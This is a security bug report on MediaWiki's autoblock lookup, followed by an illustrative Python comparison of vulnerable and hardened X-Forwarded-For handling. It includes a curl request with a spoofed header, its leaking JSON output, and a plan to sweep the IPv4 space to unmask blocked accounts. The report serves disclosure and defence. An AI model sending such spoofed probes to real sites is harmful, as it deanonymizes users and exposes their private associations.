Steps to reproduce:
- Make an edit with some account (assume your IP at this time is 1.2.3.4)
- Block that account, with autoblock enabled
- Switch to a new IP address
- Try this query:
curl -s -H "X-Forwarded-For: 1.2.3.4" 'https://test.wikipedia.org/w/api.php?action=query&meta=userinfo&format=json&uiprop=blockinfo'
The expected result is for the autoblock to be ignored.
The actual result is that the name of the blocked account appears in the response, associating the user with the IP:
{"batchcomplete":"","query":{"userinfo":{"id":0,"name":"[redacted]","anon":"","blockid":20607,"blockedby":"Suffusion of Yellow","blockedbyid":12061,"blockreason":"Autoblocked because your IP address has been recently used by \"[[User:Suffusion of Yellow alt 6|Suffusion of Yellow alt 6]]\".\nThe reason given for Suffusion of Yellow alt 6's block is \"test\"","blockedtimestamp":"2021-06-18T19:19:49Z","blockexpiry":"2021-06-18T21:19:49Z","blocknocreate":""}}}
But it gets worse. It's possible to put up to about 256 addresses in the X-Forwarded-For header before Apache rejects the header as too large, and every one of those addresses is checked for blocks, with the first hit reported in the response. So with only 2^24 requests it would be possible to sweep the whole IPv4 space and recover the account name behind every active IPv4 autoblock on the wiki. I don't know what the maximum request rate would be before someone noticed the server load and got suspicious, but at 200 requests/second that's only a day.
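To make the failure mode concrete, here is an added example (not MediaWiki's code, and not from the report above) that models the two ways a server can consult X-Forwarded-For when checking autoblocks. The autoblock table, the trusted-proxy range 203.0.113.0/24 and the client addresses are all constructed for the example. The vulnerable lookup checks every address in the header, which is what lets an unauthenticated caller probe 256 addresses per request; the hardened lookup only walks the header from the right, and only across proxies the server actually trusts, so an arbitrary header from an untrusted client never influences which IP is checked. A small header-size check is included as the kind of signal a detection engineer would alert on.

```python
import ipaddress
from typing import List, Optional

# Constructed sample data: IPs with an active autoblock, mapped to the
# account whose block produced the autoblock. Not real wiki data.
AUTOBLOCKS = {
    "1.2.3.4": "Suffusion of Yellow alt 6",
    "198.51.100.7": "ExampleAccount",
}

# Assumption for the example: the only hop allowed to add X-Forwarded-For
# entries is this reverse-proxy range. A real deployment uses its own list.
TRUSTED_PROXIES = [ipaddress.ip_network("203.0.113.0/24")]


def parse_xff(header: Optional[str]) -> List[str]:
    """Split a comma-separated XFF header into valid IP strings, dropping junk."""
    if not header:
        return []
    addrs = []
    for part in header.split(","):
        part = part.strip()
        try:
            addrs.append(str(ipaddress.ip_address(part)))
        except ValueError:
            continue  # not an IP; ignore rather than fail open or closed
    return addrs


def is_trusted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_PROXIES)


def vulnerable_autoblock_lookup(remote_addr: str, xff_header: Optional[str]) -> Optional[str]:
    """Flawed: every address the caller supplies is checked, and the first
    hit (with its account name) is reported back. This is the behaviour
    the report describes: a client can probe 256 addresses per request."""
    for ip in [remote_addr] + parse_xff(xff_header):
        if ip in AUTOBLOCKS:
            return AUTOBLOCKS[ip]
    return None


def client_ip(remote_addr: str, xff_header: Optional[str]) -> str:
    """Walk the chain right to left, stepping past trusted proxies only.
    If the direct peer is not a trusted proxy, its XFF header is ignored."""
    chain = parse_xff(xff_header)
    ip = remote_addr
    while chain and is_trusted(ip):
        ip = chain.pop()
    return ip


def hardened_autoblock_lookup(remote_addr: str, xff_header: Optional[str]) -> Optional[str]:
    """Only the single resolved client IP is checked against autoblocks."""
    return AUTOBLOCKS.get(client_ip(remote_addr, xff_header))


def is_suspicious_xff(xff_header: Optional[str], max_hops: int = 8) -> bool:
    """Detection signal: legitimate proxy chains are short; a header
    carrying dozens or hundreds of addresses is an enumeration attempt."""
    return len(parse_xff(xff_header)) > max_hops


def build_probe_batch(size: int = 256) -> str:
    """Constructed 256-address header of the shape the report describes,
    with one genuinely autoblocked address hidden in the middle."""
    addrs = ["10.0.%d.%d" % (i // 256, i % 256) for i in range(size)]
    addrs[size // 2] = "198.51.100.7"
    return ", ".join(addrs)


if __name__ == "__main__":
    batch = build_probe_batch()
    print("vulnerable, untrusted peer:", vulnerable_autoblock_lookup("192.0.2.50", batch))
    print("hardened,   untrusted peer:", hardened_autoblock_lookup("192.0.2.50", batch))
    print("hardened,   via trusted proxy:", hardened_autoblock_lookup("203.0.113.5", "1.2.3.4"))
    print("suspicious header:", is_suspicious_xff(batch))
```

The hardened lookup still applies the autoblock correctly when the request genuinely arrives through the trusted proxy with the blocked address as the client, so it is not a weakening of the block; it only stops untrusted peers from choosing which addresses get checked.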